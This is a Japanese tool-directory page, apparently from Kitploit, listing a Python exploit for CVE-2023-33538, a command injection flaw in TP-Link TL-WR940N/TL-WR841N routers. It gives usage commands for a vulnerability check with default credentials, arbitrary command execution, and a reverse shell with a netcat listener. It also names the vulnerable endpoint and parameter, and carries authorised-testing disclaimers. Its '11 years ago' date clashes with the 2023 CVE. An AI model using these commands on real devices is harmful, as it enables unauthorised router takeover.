Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-33538 — TP-Link TL-WR940N/TL-WR841N コマンドインジェクション脆弱性の Python エクスプロイト | Kitploit
ツール/GitHubGitHub/explxx/cve-2023-33538
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ワイヤレスセキュリティペネトレーションテストコマンド&コントロール学習と教育
GitHubexplxx/cve-2023-33538

CVE-2023-33538

TP-Link TL-WR940N/TL-WR841N コマンドインジェクション脆弱性の Python エクスプロイト

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

TP-Link TL-WR940N/TL-WR841N コマンドインジェクション脆弱性のPythonエクスプロイト

使用手順

  1. 基本的な脆弱性チェック:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. カスタムコマンドの実行:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
    
  3. リバースシェル (先にリスナーを nc -lvnp 4444 でセットアップ):

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
    

重要な注意点:

  • これらのスクリプトは教育およびテスト目的のみです
  • システムをテストする前に必ず適切な許可を得てください
  • デフォルトでは再起動コマンドが使用されます。これは破壊的ではなく、簡単に確認できるためです
  • リバースシェルは、利用可能なバイナリに依存するため、すべてのファームウェアバージョンで動作するとは限りません
  • 一部のファームウェアバージョンではURLにランダムパスが必要ですが、スクリプトは自動的にそれを検出しようとします

この脆弱性は、/userRpm/WlanNetworkRpm.htm エンドポイントの ssid1 パラメータにおける不適切な入力サニタイズに起因し、特別に細工されたリクエストによるコマンドインジェクションを許容します。

ツールをダウンロード